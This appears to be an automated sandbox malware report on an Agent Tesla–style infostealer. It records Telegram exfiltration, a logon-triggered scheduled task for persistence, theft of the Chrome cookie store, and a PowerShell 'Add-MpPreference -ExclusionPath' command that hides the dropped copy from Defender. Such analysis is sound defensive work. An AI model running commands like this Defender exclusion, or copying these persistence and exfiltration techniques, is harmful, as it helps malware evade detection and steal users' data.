                                          http://www.founder.com.cn/cn/cThewKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.galapagosdesign.com/staff/dennis.htmwKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://fontfabrik.comwKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://sOkRpA.comwKQpOZ58Gl.exe, 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • 0%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.founder.com.cn/cnwKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://api.telegram.org4wKQpOZ58Gl.exe, 0000000E.00000002.639234728.0000000002C51000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/frere-jones.htmlwKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.jiyu-kobo.co.jp/wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://DynDns.comDynDNSnamejidpasswordPsi/PsiwKQpOZ58Gl.exe, 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.galapagosdesign.com/DPleasewKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers8wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.fonts.comwKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.sandoll.co.krwKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.urwpp.deDPleasewKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.zhongyicts.com.cnwKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://api.telegram.orgwKQpOZ58Gl.exe, 0000000E.00000002.639326716.0000000002C66000.00000004.00000800.00020000.00000000.sdmp, wKQpOZ58Gl.exe, 0000000E.00000002.639615093.0000000002C9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namewKQpOZ58Gl.exe, 00000000.00000002.441112036.000000000272A000.00000004.00000800.00020000.00000000.sdmp, wKQpOZ58Gl.exe, 0000000E.00000002.639234728.0000000002C51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.sakkal.comwKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://api.ipify.org%wKQpOZ58Gl.exe, 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		low
                                                    https://api.telegram.orgD8wKQpOZ58Gl.exe, 0000000E.00000002.639615093.0000000002C9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    149.154.167.220
                                                    		api.telegram.orgUnited Kingdom
                                                    		62041TELEGRAMRUfalse

                                                    Private

                                                    IP
                                                    192.168.2.1

                                                    General Information

                                                    Joe Sandbox Version:35.0.0 Citrine
                                                    Analysis ID:679221
                                                    Start date and time: 05/08/202212:22:042022-08-05 12:22:04 +02:00
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 10m 21s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:light
                                                    Sample file name:wKQpOZ58Gl (renamed file extension from none to exe)
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:26
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@11/9@2/2
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HDC Information:Failed
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 0
                                                    • Number of non-executed functions: 0
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                    • Excluded IPs from analysis (whitelisted): 23.211.6.115
                                                    • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    12:23:31API Interceptor507x Sleep call for process: wKQpOZ58Gl.exe modified
                                                    12:23:38API Interceptor22x Sleep call for process: powershell.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    No context

                                                    Domains

                                                    No context

                                                    ASNs

                                                    No context

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\wKQpOZ58Gl.exe.log

                                                    Download File
                                                    Process:C:\Users\user\Desktop\wKQpOZ58Gl.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:modified
                                                    Size (bytes):1308
                                                    Entropy (8bit):5.345811588615766
                                                    Encrypted:false
                                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
                                                    MD5:2E016B886BDB8389D2DD0867BE55F87B
                                                    SHA1:25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
                                                    SHA-256:1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
                                                    SHA-512:C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
                                                    Malicious:true
                                                    Reputation:high, very likely benign file
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):22140
                                                    Entropy (8bit):5.606020442711728
                                                    Encrypted:false
                                                    SSDEEP:384:2tCDBCVRplZiWlovXSB+kjultIQ87nvOL3Ss3YEMtEm+e+AV7kjWDwLYI++BYv:CRplw2o/4NCltLzDKK4oKB
                                                    MD5:5194DEF9DA74FB9BDB66C72345F51F77
                                                    SHA1:E133CA2899438B5BFFC0D9C07B239DA11FB7A027
                                                    SHA-256:B227685E644F4F90A63543D29B18F2B1066913A43E2B4D80550828EFEF49481F
                                                    SHA-512:F304A557D7931353E5D708AA853EDA34B3736852BC741B6D0BA7CA020483D066BDA7150689A813F038DD51FE4027CAA14FFAE949B8008A3955FDEADAB7D0E948
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:@...e...........W........... .......>.y..............@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2xb4spy5.adr.ps1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:1

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h1mfggue.sz5.psm1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview:1

                                                    C:\Users\user\AppData\Local\Temp\tmp92BC.tmp

                                                    Download File
                                                    Process:C:\Users\user\Desktop\wKQpOZ58Gl.exe
                                                    File Type:XML 1.0 document, ASCII text
                                                    Category:dropped
                                                    Size (bytes):1610
                                                    Entropy (8bit):5.1196240690424615
                                                    Encrypted:false
                                                    SSDEEP:24:2di4+S2qh/S1K2ky1mo2dUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtL4jxvn:cgea6YrFdOFzOzN33ODOiDdKrsuTkdv
                                                    MD5:42890865684624F53E3DB4DD9D878F49
                                                    SHA1:F2DF00CB7531E509DBE9F0FF7DE5B01F7686E02C
                                                    SHA-256:4566F7797D9FCAC9BE63661D9C0900A537AAAB70814DDBAF5A6A448DE8379FB8
                                                    SHA-512:249DCD4967A643205AC28256B91858BD685D27CBD7092C2E6D2F64EA9AB8F79852AFA20706819CE6616AA2A1FBA980446B5EE52B1132A8F810D0EA36580CFF9C
                                                    Malicious:true
                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailab

                                                    C:\Users\user\AppData\Roaming\kqruryFrIFc.exe

                                                    Download File
                                                    Process:C:\Users\user\Desktop\wKQpOZ58Gl.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):801280
                                                    Entropy (8bit):7.692214428514328
                                                    Encrypted:false
                                                    SSDEEP:12288:hk2xg+ugGp2SrKUhxw3YjusvkRgutp43ARSepVIAnlFxCn9nLtzHeb:y2xgP01D3tRgutOzepVIAlLGnc
                                                    MD5:F7C9CF1410373A60A5C5A5E02AA4BD3C
                                                    SHA1:97CF7689F3B6DFD0EFD37E7F16AA1BD2CFE537DE
                                                    SHA-256:B5A23C2EF617A9A0B87F82EBC9F6C2C892A179A53BD35CE725BE92C68465B245
                                                    SHA-512:CF5BF661E5A61D3D64BAE9DB4D0FFDABCB37BA0AFEB9CE668F8CF284D0B37627658744B6EF9D12976F191A96462BC997A6A9F426CA1B1E48785F41B13B9EC64F
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: Virustotal, Detection: 58%, Browse
                                                    • Antivirus: Metadefender, Detection: 26%, Browse
                                                    • Antivirus: ReversingLabs, Detection: 69%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....h...............0.. ...........>... ...@....@.. ....................................@.................................D>..O....@.......................`......(>............................................... ............... ..H............text........ ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......8..............@..B................x>......H........e..........4........&...........................................0............}......}......}....."...@}.....s....% ....o.....}...........%.r...p.%.r...p.%.r%..p.}......}.....(.......(.....~....t....rE..po........{....o....&.(.....*.0.............(......{!..........s....o......{'...~j...%-.&~i.........s....%.j...o......{<..........s....o .....{/..........s....o......{9..........s....o......{4..........s....o......{5..........s....o......{2..........s....o!.....{6.....

                                                    C:\Users\user\AppData\Roaming\kqruryFrIFc.exe:Zone.Identifier

                                                    Download File
                                                    Process:C:\Users\user\Desktop\wKQpOZ58Gl.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:true
                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                    C:\Users\user\AppData\Roaming\lkbu4uc5.tjf\Chrome\Default\Cookies

                                                    Download File
                                                    Process:C:\Users\user\Desktop\wKQpOZ58Gl.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.6951152985249047
                                                    Encrypted:false
                                                    SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBopIvJn2QOYiUG3PaVrX:T5LLOpEO5J/Kn7U1uBopIvZXC/alX
                                                    MD5:EA7F9615D77815B5FFF7C15179C6C560
                                                    SHA1:3D1D0BAC6633344E2B6592464EBB957D0D8DD48F
                                                    SHA-256:A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
                                                    SHA-512:9C818471F69758BD4884FDB9B543211C9E1EE832AC29C2C5A0377C412454E8C745FB3F38FF6E3853AE365D04933C0EC55A46DDA60580D244B308F92C57258C98
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\Documents\20220805\PowerShell_transcript.390120.zw_Mb_9m.20220805122336.txt

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):5823
                                                    Entropy (8bit):5.379640905451343
                                                    Encrypted:false
                                                    SSDEEP:96:BZYTLRNbtyqDo1ZerZsTLRNbtyqDo1ZaHt5tPtjZsTLRNbtyqDo1ZRgt/t/tFZy:KTQtDt2B11c
                                                    MD5:AA51436F359F179B13C378A25400B57B
                                                    SHA1:5475ECFCCB96DDC21AEE9E1F7AF15CB7FC631709
                                                    SHA-256:0A69FABF20881D38889AD87BB59058651DAD9B9E449BD4E668ADE2F244E4E7E3
                                                    SHA-512:2C53C83181B92B4F64766FD51445E641B921AD543BC48604E8DF0074ED995EAAA3710B1DF06745063C682AA1995C2C2045EDB76A5FF3B314030EBBD53D3F5DE3
                                                    Malicious:false
                                                    Preview:.**********************..Windows PowerShell transcript start..Start time: 20220805122338..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 390120 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\kqruryFrIFc.exe..Process ID: 6088..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220805122338..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\kqruryFrIFc.exe..**********************..Windows PowerShell transcript start..Start time: 20220805122644..Username: computer\user..RunAs User: DES

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.692214428514328
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    • DOS Executable Generic (2002/1) 0.01%
                                                    File name:wKQpOZ58Gl.exe
                                                    File size:801280
                                                    MD5:f7c9cf1410373a60a5c5a5e02aa4bd3c
                                                    SHA1:97cf7689f3b6dfd0efd37e7f16aa1bd2cfe537de
                                                    SHA256:b5a23c2ef617a9a0b87f82ebc9f6c2c892a179a53bd35ce725be92c68465b245
                                                    SHA512:cf5bf661e5a61d3d64bae9db4d0ffdabcb37ba0afeb9ce668f8cf284d0b37627658744b6ef9d12976f191a96462bc997a6a9f426ca1b1e48785f41b13b9ec64f
                                                    SSDEEP:12288:hk2xg+ugGp2SrKUhxw3YjusvkRgutp43ARSepVIAnlFxCn9nLtzHeb:y2xgP01D3tRgutOzepVIAlLGnc
                                                    TLSH:0205E090B9689B22D67EE7F8947121106BF17C66252AE79D2EC134CE0CB3F944E31E53
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....h...............0.. ...........>... ...@....@.. ....................................@................................

                                                    File Icon

                                                    Icon Hash:13332f0f0f3b3313

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x4c3e96
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0xED6817C1 [Mon Mar 19 19:00:17 2096 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xc3e440x4f.text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x14f8.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xc60000xc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xc3e280x1c.text
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000xc1e9c0xc2000False0.8389678640463918data7.704114614834008IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rsrc0xc40000x14f80x1600False0.2373934659090909data4.363906918934409IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0xc60000xc0x200False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountry
                                                    RT_ICON0xc40e80x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4294967295, next used block 4294967295
                                                    RT_GROUP_ICON0xc51900x14data
                                                    RT_VERSION0xc51a40x354data

                                                    Imports

                                                    DLLImport
                                                    mscoree.dll_CorExeMain

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    192.168.2.6149.154.167.220497834432851779 08/05/22-12:24:11.625878TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49783443192.168.2.6149.154.167.220

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Aug 5, 2022 12:24:10.854499102 CEST49783443192.168.2.6149.154.167.220
                                                    Aug 5, 2022 12:24:10.854537964 CEST44349783149.154.167.220192.168.2.6
                                                    Aug 5, 2022 12:24:10.854635954 CEST49783443192.168.2.6149.154.167.220
                                                    Aug 5, 2022 12:24:10.924236059 CEST49783443192.168.2.6149.154.167.220
                                                    Aug 5, 2022 12:24:10.924259901 CEST44349783149.154.167.220192.168.2.6
                                                    Aug 5, 2022 12:24:10.994270086 CEST44349783149.154.167.220192.168.2.6
